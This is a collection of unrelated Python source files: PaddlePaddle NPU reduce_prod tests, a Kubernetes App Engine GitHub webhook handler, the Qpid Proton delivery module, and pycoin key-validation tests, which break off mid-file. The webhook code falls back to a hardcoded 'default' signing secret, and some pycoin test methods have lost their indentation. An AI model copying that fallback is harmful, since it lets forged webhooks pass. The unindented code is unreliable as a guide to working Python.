        self.outputs = {'Out': self.inputs['X'].prod()}
class TestNPUReduceProdWithOutDtype_bool(TestNPUReduceProd):
    """reduce_prod with out_dtype=BOOL: result cast to boolean."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.BOOL)}
        self.outputs = {
            'Out':
            # np.bool was a deprecated alias for the builtin bool and was
            # removed in NumPy 1.24; np.bool_ is the actual scalar type and
            # behaves identically here.
            self.inputs['X'].prod(axis=tuple(self.attrs['dim'])).astype(
                np.bool_)
        }
class TestNPUReduceProdWithOutDtype_int16(TestNPUReduceProd):
    """reduce_prod with out_dtype=INT16."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.INT16)}
        self.outputs = {
            'Out': self.inputs['X'].prod(
                axis=tuple(self.attrs['dim'])).astype(np.int16)
        }
class TestNPUReduceProdWithOutDtype_int32(TestNPUReduceProd):
    """reduce_prod with out_dtype=INT32."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.INT32)}
        self.outputs = {
            'Out': self.inputs['X'].prod(
                axis=tuple(self.attrs['dim'])).astype(np.int32)
        }
class TestNPUReduceProdWithOutDtype_int64(TestNPUReduceProd):
    """reduce_prod with out_dtype=INT64."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.INT64)}
        self.outputs = {
            'Out': self.inputs['X'].prod(
                axis=tuple(self.attrs['dim'])).astype(np.int64)
        }
class TestNPUReduceProdWithOutDtype_fp16(TestNPUReduceProd):
    """reduce_prod with out_dtype=FP16; loosened tolerance for half precision."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP16)}
        self.outputs = {
            'Out': self.inputs['X'].prod(
                axis=tuple(self.attrs['dim'])).astype(np.float16)
        }

    def test_check_output(self):
        # fp16 output needs a looser absolute tolerance.
        self.check_output_with_place(self.place, atol=1e-3)
class TestNPUReduceProdWithOutDtype_fp32(TestNPUReduceProd):
    """reduce_prod along dim 0 with the output cast to float32."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        x = np.random.random((5, 6, 10)).astype(self.dtype)
        self.inputs = {'X': x}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP32)}
        reduced = x.prod(axis=tuple(self.attrs['dim']))
        self.outputs = {'Out': reduced.astype(np.float32)}
class TestNPUReduceProdWithOutDtype_fp64(TestNPUReduceProd):
    """reduce_prod along dim 0 with the output cast to float64."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        x = np.random.random((5, 6, 10)).astype(self.dtype)
        self.inputs = {'X': x}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP64)}
        reduced = x.prod(axis=tuple(self.attrs['dim']))
        self.outputs = {'Out': reduced.astype(np.float64)}
@skip_check_grad_ci(reason="right now not implement grad op")
class TestNPUReduceProdWithOutDtype_fp32_2(TestNPUReduceProd):
    """Same as the fp32 out_dtype case, but fed half-precision inputs."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        x = np.random.random((5, 6, 10)).astype(self.dtype)
        self.inputs = {'X': x}
        self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP32)}
        reduced = x.prod(axis=tuple(self.attrs['dim']))
        self.outputs = {'Out': reduced.astype(np.float32)}

    def init_dtype(self):
        # Override the base dtype so the op consumes fp16 input tensors.
        self.dtype = np.float16
if __name__ == '__main__':
    # Run the whole reduce_prod test suite when executed as a script.
    unittest.main()
| |
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import datetime
import hashlib
import hmac
import logging
import json
import traceback
import webapp2
from webapp2_extras import security
from google.appengine.api.runtime import memory_usage
from google.appengine.datastore import datastore_query
import classifier
import models
# Shared secret used to verify GitHub webhook HMAC signatures.
try:
    WEBHOOK_SECRET = open('webhook_secret').read().strip()
except IOError:
    # Keep the app bootable without the secret file (e.g. local dev);
    # signature checks will then only match payloads signed with 'default'.
    logging.warning('unable to load webhook secret')
    WEBHOOK_SECRET = 'default'
def make_signature(body):
    """Return the GitHub-style ``X-Hub-Signature`` value for *body*.

    GitHub signs webhook payloads with HMAC-SHA1 over the raw request
    body using the shared webhook secret.
    """
    digest = hmac.new(WEBHOOK_SECRET, body, hashlib.sha1).hexdigest()
    return 'sha1=%s' % digest
class GithubHandler(webapp2.RequestHandler):
    '''
    Handle POSTs delivered using GitHub's webhook interface. Posts are
    authenticated with HMAC signatures and a shared secret.
    Each event is saved to a database, and can trigger additional
    processing.
    '''
    def post(self):
        # Authenticate the delivery before trusting anything in the payload.
        event = self.request.headers.get('x-github-event')
        signature = self.request.headers.get('x-hub-signature', '')
        body = self.request.body
        expected_signature = make_signature(body)
        if not security.compare_hashes(signature, expected_signature):
            logging.error('webhook failed signature check')
            self.abort(400)
        body_json = json.loads(body)
        repo = body_json.get('repository', {}).get('full_name')
        # Determine which issue/PR (if any) this event concerns.
        number = None
        if 'pull_request' in body_json:
            number = body_json['pull_request']['number']
        elif 'issue' in body_json:
            number = body_json['issue']['number']
        parent = None
        if number:
            parent = models.GithubResource.make_key(repo, number)
        kwargs = {}
        # An optional header lets the deliverer supply an explicit
        # event timestamp (microsecond-precision, space-separated format).
        timestamp = self.request.headers.get('x-timestamp')
        if timestamp is not None:
            kwargs['timestamp'] = datetime.datetime.strptime(
                timestamp, '%Y-%m-%d %H:%M:%S.%f')
        # Persist the raw event first, then do derived processing.
        webhook = models.GithubWebhookRaw(
            parent=parent,
            repo=repo, number=number, event=event, body=body, **kwargs)
        webhook.put()
        if event == 'status':
            # Status events reference a commit rather than an issue: save
            # the status and refresh every PR whose head is that commit.
            status = models.GHStatus.from_json(body_json)
            models.save_if_newer(status)
            query = models.GHIssueDigest.find_head(repo, status.sha)
            for issue in query.fetch():
                update_issue_digest(issue.repo, issue.number)
        if number is not None:
            update_issue_digest(repo, number)
def update_issue_digest(repo, number, always_put=False):
    """Reclassify an issue/PR and persist the resulting digest."""
    classified = classifier.classify_issue(repo, number)
    digest = models.GHIssueDigest.make(repo, number, *classified)
    if not always_put:
        # Let save_if_newer decide whether the stored digest is stale.
        models.save_if_newer(digest)
    else:
        digest.put()
class BaseHandler(webapp2.RequestHandler):
    """Request handler base that applies a restrictive CSP to responses."""

    def dispatch(self):
        # Eh, this is less work than making all the debug pages escape properly.
        # No resources allowed except for inline CSS, no iframing of content.
        csp = "default-src none; style-src 'unsafe-inline'; frame-ancestors none"
        self.response.headers['Content-Security-Policy'] = csp
        super(BaseHandler, self).dispatch()
class Events(BaseHandler):
    '''
    Perform input/output on a series of webhook events from the datastore, for
    debugging purposes.
    '''
    def get(self):
        """Emit stored webhook events as JSON, paginated by datastore cursor.

        Query parameters:
            cursor: opaque datastore cursor for pagination.
            repo, number: when both are supplied, restrict to one issue/PR.
            count: page size (default 500).
        """
        cursor = datastore_query.Cursor(urlsafe=self.request.get('cursor'))
        repo = self.request.get('repo')
        number = int(self.request.get('number', 0)) or None
        count = int(self.request.get('count', 500))
        # BUG FIX: webapp2's request.get() returns '' (not None) for missing
        # parameters, so `repo is not None` was always true and a request
        # with only `number` silently queried repo == ''. Filter only when
        # both a repo and an issue number were actually supplied.
        if repo and number is not None:
            q = models.GithubWebhookRaw.query(
                models.GithubWebhookRaw.repo == repo,
                models.GithubWebhookRaw.number == number)
        else:
            q = models.GithubWebhookRaw.query()
        q = q.order(models.GithubWebhookRaw.timestamp)
        events, next_cursor, more = q.fetch_page(count, start_cursor=cursor)
        out = []
        for event in events:
            out.append({'repo': event.repo, 'event': event.event,
                        'timestamp': str(event.timestamp),
                        'body': json.loads(event.body)})
        # 'next' is False on the last page, otherwise a cursor token.
        resp = {'next': more and next_cursor.urlsafe(), 'calls': out}
        self.response.headers['content-type'] = 'text/json'
        self.response.write(json.dumps(resp, indent=4, sort_keys=True))
class Status(BaseHandler):
    """Debug page listing the GitHub statuses recorded for a repo/sha."""

    def get(self):
        repo = self.request.get('repo')
        sha = self.request.get('sha')
        if not (repo and sha):
            # Both parameters are required.
            self.abort(403)
            return
        results = models.GHStatus.query_for_sha(repo, sha)
        self.response.write('<table>')
        for res in results:
            row = '<tr><td>%s<td>%s<td><a href="%s">%s</a>\n' % (
                res.context, res.state, res.target_url, res.description)
            self.response.write(row)
class Timeline(BaseHandler):
    '''
    Render all the information in the datastore about a particular issue.
    This is used for debugging and investigations.
    '''
    def emit_classified(self, repo, number):
        # Show the classifier's verdict for this issue; any failure is
        # rendered inline as a traceback instead of breaking the page.
        try:
            self.response.write('<h3>Classifier Output</h3>')
            ret = classifier.classify_issue(repo, number)
            self.response.write('<ul><li>pr: %s<li>open: %s<li>involved: %s'
                                % tuple(ret[:3]))
            self.response.write('<li>last_event_timestamp: %s' % ret[4])
            self.response.write('<li>payload len: %d' %len(json.dumps(ret[3])))
            self.response.write('<pre>%s</pre></ul>' % cgi.escape(
                json.dumps(ret[3], indent=2, sort_keys=True)))
        except BaseException:
            self.response.write('<pre>%s</pre>' % traceback.format_exc())

    def emit_events(self, repo, number):
        # Dump the distilled event stream and the raw webhook bodies for
        # the issue, returning a merged view of the latest payload fields.
        ancestor = models.GithubResource.make_key(repo, number)
        events = list(models.GithubWebhookRaw.query(ancestor=ancestor))
        events.sort(key=lambda e: e.timestamp)
        self.response.write('<h3>Distilled Events</h3>')
        self.response.write('<pre>')
        event_pairs = [event.to_tuple() for event in events]
        for ev in classifier.distill_events(event_pairs):
            self.response.write(cgi.escape('%s, %s %s\n' % ev))
        self.response.write('</pre>')
        self.response.write('<h3>%d Raw Events</h3>' % (len(events)))
        self.response.write('<table border=2>')
        merged = {}
        for event in events:
            body_json = json.loads(event.body)
            models.shrink(body_json)
            # Later events overwrite earlier fields, so `merged` ends up
            # holding the most recent issue/PR snapshot.
            if 'issue' in body_json:
                merged.update(body_json['issue'])
            elif 'pull_request' in body_json:
                merged.update(body_json['pull_request'])
            body = json.dumps(body_json, indent=2)
            action = body_json.get('action')
            sender = body_json.get('sender', {}).get('login')
            self.response.write('<tr><td>%s\n' % '<td>'.join(str(x) for x in
                [event.timestamp, event.event, action, sender,
                 '<pre>' + cgi.escape(body)]))
        return merged

    def get(self):
        repo = self.request.get('repo')
        number = self.request.get('number')
        if self.request.get('format') == 'json':
            # Raw JSON dump of every stored webhook body for this issue.
            ancestor = models.GithubResource.make_key(repo, number)
            events = list(models.GithubWebhookRaw.query(ancestor=ancestor))
            self.response.headers['content-type'] = 'application/json'
            self.response.write(json.dumps([e.body for e in events], indent=True))
            return
        self.response.write(
            '<style>td pre{max-height:200px;overflow:scroll}</style>')
        # The interleaved memory checkpoints help spot which stage of the
        # page build is expensive on App Engine.
        self.response.write('<p>Memory: %s' % memory_usage().current())
        self.emit_classified(repo, number)
        self.response.write('<p>Memory: %s' % memory_usage().current())
        if self.request.get('classify_only'):
            return
        merged = self.emit_events(repo, number)
        self.response.write('<p>Memory: %s' % memory_usage().current())
        if 'head' in merged:
            # For PRs, also show statuses recorded for the head commit.
            sha = merged['head']['sha']
            results = models.GHStatus.query_for_sha(repo, sha)
            self.response.write('</table><table>')
            for res in results:
                self.response.write('<tr><td>%s<td>%s<td><a href="%s">%s</a>\n'
                    % (res.context, res.state, res.target_url, res.description))
        models.shrink(merged)
        self.response.write('</table><pre>%s</pre>' % cgi.escape(
            json.dumps(merged, indent=2, sort_keys=True)))
        self.response.write('<p>Memory: %s' % memory_usage().current())
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from cproton import PN_ACCEPTED, PN_MODIFIED, PN_RECEIVED, PN_REJECTED, PN_RELEASED, pn_delivery_abort, \
pn_delivery_aborted, pn_delivery_attachments, pn_delivery_link, pn_delivery_local, pn_delivery_local_state, \
pn_delivery_partial, pn_delivery_pending, pn_delivery_readable, pn_delivery_remote, pn_delivery_remote_state, \
pn_delivery_settle, pn_delivery_settled, pn_delivery_tag, pn_delivery_update, pn_delivery_updated, \
pn_delivery_writable, pn_disposition_annotations, pn_disposition_condition, pn_disposition_data, \
pn_disposition_get_section_number, pn_disposition_get_section_offset, pn_disposition_is_failed, \
pn_disposition_is_undeliverable, pn_disposition_set_failed, pn_disposition_set_section_number, \
pn_disposition_set_section_offset, pn_disposition_set_undeliverable, pn_disposition_type, pn_work_next
from ._condition import cond2obj, obj2cond
from ._data import dat2obj, obj2dat
from ._wrapper import Wrapper
class NamedInt(int):
    """An ``int`` that renders as a symbolic name.

    Every instance is recorded in the class-level ``values`` registry so
    that :meth:`get` can map a raw integer back to its named counterpart.
    """
    values = {}  # registry of int -> NamedInt; subclasses override this

    def __new__(cls, i, name):
        instance = super(NamedInt, cls).__new__(cls, i)
        cls.values[i] = instance
        return instance

    def __init__(self, i, name):
        self.name = name

    def __repr__(self):
        return self.name

    def __str__(self):
        return self.name

    @classmethod
    def get(cls, i):
        """Return the named instance for *i*, or *i* itself if unknown."""
        return cls.values.get(i, i)
class DispositionType(NamedInt):
    # Give disposition constants their own registry so they do not
    # collide with values registered by other NamedInt subclasses.
    values = {}
class Disposition(object):
    """
    A delivery state.
    Dispositions record the current state or final outcome of a
    transfer. Every delivery contains both a local and remote
    disposition. The local disposition holds the local state of the
    delivery, and the remote disposition holds the last known remote
    state of the delivery.
    """

    RECEIVED = DispositionType(PN_RECEIVED, "RECEIVED")
    """
    A non terminal state indicating how much (if any) message data
    has been received for a delivery.
    """

    ACCEPTED = DispositionType(PN_ACCEPTED, "ACCEPTED")
    """
    A terminal state indicating that the delivery was successfully
    processed. Once in this state there will be no further state
    changes prior to the delivery being settled.
    """

    REJECTED = DispositionType(PN_REJECTED, "REJECTED")
    """
    A terminal state indicating that the delivery could not be
    processed due to some error condition. Once in this state
    there will be no further state changes prior to the delivery
    being settled.
    """

    RELEASED = DispositionType(PN_RELEASED, "RELEASED")
    """
    A terminal state indicating that the delivery is being
    returned to the sender. Once in this state there will be no
    further state changes prior to the delivery being settled.
    """

    MODIFIED = DispositionType(PN_MODIFIED, "MODIFIED")
    """
    A terminal state indicating that the delivery is being
    returned to the sender and should be annotated by the
    sender prior to further delivery attempts. Once in this
    state there will be no further state changes prior to the
    delivery being settled.
    """

    def __init__(self, impl, local):
        # impl: the underlying C disposition record; local: True for the
        # locally owned disposition, False for the remote peer's.
        self._impl = impl
        self.local = local
        # Local-side data/condition/annotations are staged on the Python
        # object and pushed into the C disposition by Delivery.update().
        self._data = None
        self._condition = None
        self._annotations = None

    @property
    def type(self):
        """
        Get the type of this disposition object.
        Defined values are:
        * :const:`RECEIVED`
        * :const:`ACCEPTED`
        * :const:`REJECTED`
        * :const:`RELEASED`
        * :const:`MODIFIED`
        :type: ``str``
        """
        return DispositionType.get(pn_disposition_type(self._impl))

    def _get_section_number(self):
        return pn_disposition_get_section_number(self._impl)

    def _set_section_number(self, n):
        pn_disposition_set_section_number(self._impl, n)

    section_number = property(_get_section_number, _set_section_number, doc="""
        The section number associated with a disposition.
        :type: ``int``
        """)

    def _get_section_offset(self):
        return pn_disposition_get_section_offset(self._impl)

    def _set_section_offset(self, n):
        pn_disposition_set_section_offset(self._impl, n)

    section_offset = property(_get_section_offset, _set_section_offset, doc="""
        The section offset associated with a disposition.
        :type: ``int``
        """)

    def _get_failed(self):
        return pn_disposition_is_failed(self._impl)

    def _set_failed(self, b):
        pn_disposition_set_failed(self._impl, b)

    failed = property(_get_failed, _set_failed, doc="""
        The failed flag for this disposition.
        :type: ``bool``
        """)

    def _get_undeliverable(self):
        return pn_disposition_is_undeliverable(self._impl)

    def _set_undeliverable(self, b):
        pn_disposition_set_undeliverable(self._impl, b)

    undeliverable = property(_get_undeliverable, _set_undeliverable, doc="""
        The undeliverable flag for this disposition.
        :type: ``bool``
        """)

    def _get_data(self):
        # Local side reads the staged Python value; remote side reads the
        # value most recently received from the peer via the C record.
        if self.local:
            return self._data
        else:
            return dat2obj(pn_disposition_data(self._impl))

    def _set_data(self, obj):
        if self.local:
            self._data = obj
        else:
            raise AttributeError("data attribute is read-only")

    data = property(_get_data, _set_data, doc="""
        Access the disposition as a :class:`Data` object.
        Dispositions are an extension point in the AMQP protocol. The
        disposition interface provides setters/getters for those
        dispositions that are predefined by the specification, however
        access to the raw disposition data is provided so that other
        dispositions can be used.
        The :class:`Data` object returned by this operation is valid until
        the parent delivery is settled.
        :type: :class:`Data`
        """)

    def _get_annotations(self):
        # Same local/remote asymmetry as `data` above.
        if self.local:
            return self._annotations
        else:
            return dat2obj(pn_disposition_annotations(self._impl))

    def _set_annotations(self, obj):
        if self.local:
            self._annotations = obj
        else:
            raise AttributeError("annotations attribute is read-only")

    annotations = property(_get_annotations, _set_annotations, doc="""
        The annotations associated with a disposition.
        The :class:`Data` object retrieved by this operation may be modified
        prior to updating a delivery. When a delivery is updated, the
        annotations described by the :class:`Data` are reported to the peer
        if applicable to the current delivery state, e.g. states such as
        :const:`MODIFIED`. The :class:`Data` must be empty or contain a symbol
        keyed map.
        The :class:`Data` object returned by this operation is valid until
        the parent delivery is settled.
        :type: :class:`Data`
        """)

    def _get_condition(self):
        # Same local/remote asymmetry as `data` above.
        if self.local:
            return self._condition
        else:
            return cond2obj(pn_disposition_condition(self._impl))

    def _set_condition(self, obj):
        if self.local:
            self._condition = obj
        else:
            raise AttributeError("condition attribute is read-only")

    condition = property(_get_condition, _set_condition, doc="""
        The condition object associated with a disposition.
        The :class:`Condition` object retrieved by this operation may be
        modified prior to updating a delivery. When a delivery is updated,
        the condition described by the disposition is reported to the peer
        if applicable to the current delivery state, e.g. states such as
        :const:`REJECTED`.
        :type: :class:`Condition`
        """)
class Delivery(Wrapper):
    """
    Tracks and/or records the delivery of a message over a link.
    """

    RECEIVED = Disposition.RECEIVED
    """
    A non terminal state indicating how much (if any) message data
    has been received for a delivery.
    """

    ACCEPTED = Disposition.ACCEPTED
    """
    A terminal state indicating that the delivery was successfully
    processed. Once in this state there will be no further state
    changes prior to the delivery being settled.
    """

    REJECTED = Disposition.REJECTED
    """
    A terminal state indicating that the delivery could not be
    processed due to some error condition. Once in this state
    there will be no further state changes prior to the delivery
    being settled.
    """

    RELEASED = Disposition.RELEASED
    """
    A terminal state indicating that the delivery is being
    returned to the sender. Once in this state there will be no
    further state changes prior to the delivery being settled.
    """

    MODIFIED = Disposition.MODIFIED
    """
    A terminal state indicating that the delivery is being
    returned to the sender and should be annotated by the
    sender prior to further delivery attempts. Once in this
    state there will be no further state changes prior to the
    delivery being settled.
    """

    @staticmethod
    def wrap(impl):
        # Map a null C pointer to None rather than wrapping it.
        if impl is None:
            return None
        else:
            return Delivery(impl)

    def __init__(self, impl):
        Wrapper.__init__(self, impl, pn_delivery_attachments)

    def _init(self):
        # Wrap the two disposition records owned by the C delivery: the
        # local one is writable, the remote one read-only (see Disposition).
        self.local = Disposition(pn_delivery_local(self._impl), True)
        self.remote = Disposition(pn_delivery_remote(self._impl), False)

    @property
    def tag(self):
        """
        The identifier for the delivery.
        :type: ``bytes``
        """
        return pn_delivery_tag(self._impl)

    @property
    def writable(self):
        """
        ``True`` for an outgoing delivery to which data can now be written,
        ``False`` otherwise..
        :type: ``bool``
        """
        return pn_delivery_writable(self._impl)

    @property
    def readable(self):
        """
        ``True`` for an incoming delivery that has data to read,
        ``False`` otherwise..
        :type: ``bool``
        """
        return pn_delivery_readable(self._impl)

    @property
    def updated(self):
        """
        ``True`` if the state of the delivery has been updated
        (e.g. it has been settled and/or accepted, rejected etc),
        ``False`` otherwise.
        :type: ``bool``
        """
        return pn_delivery_updated(self._impl)

    def update(self, state):
        """
        Set the local state of the delivery e.g. :const:`ACCEPTED`,
        :const:`REJECTED`, :const:`RELEASED`.
        :param state: State of delivery
        :type state: ``int``
        """
        # Flush any locally staged disposition data/annotations/condition
        # down into the C disposition before signalling the state change.
        obj2dat(self.local._data, pn_disposition_data(self.local._impl))
        obj2dat(self.local._annotations, pn_disposition_annotations(self.local._impl))
        obj2cond(self.local._condition, pn_disposition_condition(self.local._impl))
        pn_delivery_update(self._impl, state)

    @property
    def pending(self):
        """
        The amount of pending message data for a delivery.
        :type: ``int``
        """
        return pn_delivery_pending(self._impl)

    @property
    def partial(self):
        """
        ``True`` for an incoming delivery if not all the data is
        yet available, ``False`` otherwise.
        :type: ``bool``
        """
        return pn_delivery_partial(self._impl)

    @property
    def local_state(self):
        """
        A string representation of the local state of the delivery.
        :type: ``str``
        """
        return DispositionType.get(pn_delivery_local_state(self._impl))

    @property
    def remote_state(self):
        """
        A string representation of the state of the delivery as
        indicated by the remote peer.
        :type: ``str``
        """
        return DispositionType.get(pn_delivery_remote_state(self._impl))

    @property
    def settled(self):
        """
        ``True`` if the delivery has been settled by the remote peer,
        ``False`` otherwise.
        :type: ``bool``
        """
        return pn_delivery_settled(self._impl)

    def settle(self):
        """
        Settles the delivery locally. This indicates the application
        considers the delivery complete and does not wish to receive any
        further events about it. Every delivery should be settled locally.
        """
        pn_delivery_settle(self._impl)

    @property
    def aborted(self):
        """
        ``True`` if the delivery has been aborted, ``False`` otherwise.
        :type: ``bool``
        """
        return pn_delivery_aborted(self._impl)

    def abort(self):
        """
        Aborts the delivery. This indicates the application wishes to
        invalidate any data that may have already been sent on this delivery.
        The delivery cannot be aborted after it has been completely delivered.
        """
        pn_delivery_abort(self._impl)

    @property
    def work_next(self):
        """Deprecated: use on_message(), on_accepted(), on_rejected(),
        on_released(), and on_settled() instead.
        The next :class:`Delivery` on the connection that has pending
        operations.
        :type: :class:`Delivery`
        """
        return Delivery.wrap(pn_work_next(self._impl))

    @property
    def link(self):
        """
        The :class:`Link` on which the delivery was sent or received.
        :type: :class:`Link`
        """
        # Local import: _endpoints imports from this module, so importing
        # it lazily here avoids a circular import at module load time.
        from . import _endpoints
        return _endpoints.Link.wrap(pn_delivery_link(self._impl))

    @property
    def session(self):
        """
        The :class:`Session` over which the delivery was sent or received.
        :type: :class:`Session`
        """
        return self.link.session

    @property
    def connection(self):
        """
        The :class:`Connection` over which the delivery was sent or received.
        :type: :class:`Connection`
        """
        return self.session.connection

    @property
    def transport(self):
        """
        The :class:`Transport` bound to the :class:`Connection` over which
        the delivery was sent or received.
        :type: :class:`Transport`
        """
        return self.connection.transport
| |
#!/usr/bin/env python
import unittest
from pycoin.ecdsa import generator_secp256k1
from pycoin.ecdsa.ellipticcurve import Point, NoSuchPointError
from pycoin.encoding import hash160_sec_to_bitcoin_address
from pycoin.key import Key
from pycoin.key.BIP32Node import BIP32Node
from pycoin.key.Key import InvalidPublicPairError, InvalidSecretExponentError
from pycoin.key.validate import is_address_valid, is_wif_valid, is_public_bip32_valid, is_private_bip32_valid
from pycoin.networks import pay_to_script_prefix_for_netcode, network_codes
def change_prefix(address, new_prefix):
    """Re-encode *address* using a different address prefix byte."""
    h160 = Key.from_text(address).hash160()
    return hash160_sec_to_bitcoin_address(h160, address_prefix=new_prefix)
# Well-known mainnet pay-to-pubkey-hash ("1...") addresses used as fixtures.
PAY_TO_HASH_ADDRESSES = ["1BgGZ9tcN4rm9KBzDn7KprQz87SZ26SAMH", "1EHNa6Q4Jz2uvNExL497mE43ikXhwF6kZm",
                         "1cMh228HTCiwS8ZsaakH8A8wze1JR5ZsP", "1LagHJk2FyCV2VzrNHVqg3gYG4TSYwDV4m",
                         "1CUNEBjYrCn2y1SdiUMohaKUi4wpP326Lb", "1NZUP3JAc9JkmbvmoTv7nVgZGtyJjirKV1"]
# The same hash160 values re-encoded with the BTC pay-to-script prefix ("3...").
PAY_TO_SCRIPT_PREFIX = pay_to_script_prefix_for_netcode("BTC")
PAY_TO_SCRIPT_ADDRESSES = [change_prefix(t, PAY_TO_SCRIPT_PREFIX) for t in PAY_TO_HASH_ADDRESSES]
class KeyUtilsTest(unittest.TestCase):
def test_address_valid_btc(self):
for address in PAY_TO_HASH_ADDRESSES:
self.assertEqual(is_address_valid(address), "BTC")
a = address[:-1] + chr(ord(address[-1])+1)
self.assertEqual(is_address_valid(a), None)
for address in PAY_TO_HASH_ADDRESSES:
self.assertEqual(is_address_valid(address, allowable_types=["pay_to_script"]), None)
self.assertEqual(is_address_valid(address, allowable_types=["address"]), "BTC")
for address in PAY_TO_SCRIPT_ADDRESSES:
self.assertEqual(address[0], "3")
self.assertEqual(is_address_valid(address, allowable_types=["pay_to_script"]), "BTC")
self.assertEqual(is_address_valid(address, allowable_types=["address"]), None)
def test_is_wif_valid(self):
WIFS = ["KwDiBf89QgGbjEhKnhXJuH7LrciVrZi3qYjgd9M7rFU73sVHnoWn",
"5HpHagT65TZzG1PH3CSu63k8DbpvD8s5ip4nEB3kEsreAnchuDf",
"KwDiBf89QgGbjEhKnhXJuH7LrciVrZi3qYjgd9M7rFU74NMTptX4",
"5HpHagT65TZzG1PH3CSu63k8DbpvD8s5ip4nEB3kEsreAvUcVfH"]
for wif in WIFS:
self.assertEqual(is_wif_valid(wif), "BTC")
a = wif[:-1] + chr(ord(wif[-1])+1)
self.assertEqual(is_wif_valid(a), None)
NETWORK_NAMES = network_codes()
for netcode in NETWORK_NAMES:
for se in range(1, 10):
key = Key(secret_exponent=se, netcode=netcode)
for tv in [True, False]:
wif = key.wif(use_uncompressed=tv)
self.assertEqual(is_wif_valid(wif, allowable_netcodes=[netcode]), netcode)
a = wif[:-1] + chr(ord(wif[-1])+1)
self.assertEqual(is_wif_valid(a, allowable_netcodes=[netcode]), None)
    def test_is_public_private_bip32_valid(self):
        # BIP32 private keys must validate only as private, public keys
        # only as public, and a single-character corruption must break both.
        NETWORK_NAMES = network_codes()
        WALLET_KEYS = ["foo", "1", "2", "3", "4", "5"]
        # not all networks support BIP32 yet
        for netcode in "BTC XTN DOGE".split():
            for wk in WALLET_KEYS:
                wallet = BIP32Node.from_master_secret(wk.encode("utf8"), netcode=netcode)
                text = wallet.wallet_key(as_private=True)
                self.assertEqual(is_private_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), netcode)
                self.assertEqual(is_public_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), None)
                a = text[:-1] + chr(ord(text[-1])+1)
                self.assertEqual(is_private_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
                self.assertEqual(is_public_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
                text = wallet.wallet_key(as_private=False)
                self.assertEqual(is_private_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), None)
                self.assertEqual(is_public_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), netcode)
                a = text[:-1] + chr(ord(text[-1])+1)
                self.assertEqual(is_private_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
                self.assertEqual(is_public_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
def test_key_limits(self):
nc = 'BTC'
cc = b'000102030405060708090a0b0c0d0e0f'
order = generator_secp256k1.order()
for k in -1, 0, order, order + 1:
self.assertRaises(InvalidSecretExponentError, Key, secret_exponent=k)
self.assertRaises(InvalidSecretExponentError, BIP32Node, nc, cc, secret_exponent=k)
for i in range(1, 512):
Key(secret_exponent=i)
BIP32Node(nc, cc, secret_exponent=i)
def test_points(self):
secp256k1_curve = generator_secp256k1.curve()
# From <https://crypto.stackexchange.com/questions/784/are-there-any-secp256k1-ecdsa-test-examples-available>
test_points = []
k = 1
x = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
y = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8
test_points.append((k, x, y))
k = 2
x = 0xC6047F9441ED7D6D3045406E95C07CD85C778E4B8CEF3CA7ABAC09B95C709EE5
y = 0x1AE168FEA63DC339A3C58419466CEAEEF7F632653266D0E1236431A950CFE52A
test_points.append((k, x, y))
k = 3
x = 0xF9308A019258C31049344F85F89D5229B531C845836F99B08601F113BCE036F9
y = 0x388F7B0F632DE8140FE337E62A37F3566500A99934C2231B6CB9FD7584B8E672
test_points.append((k, x, y))
k = 4
x = 0xE493DBF1C10D80F3581E4904930B1404CC6C13900EE0758474FA94ABE8C4CD13
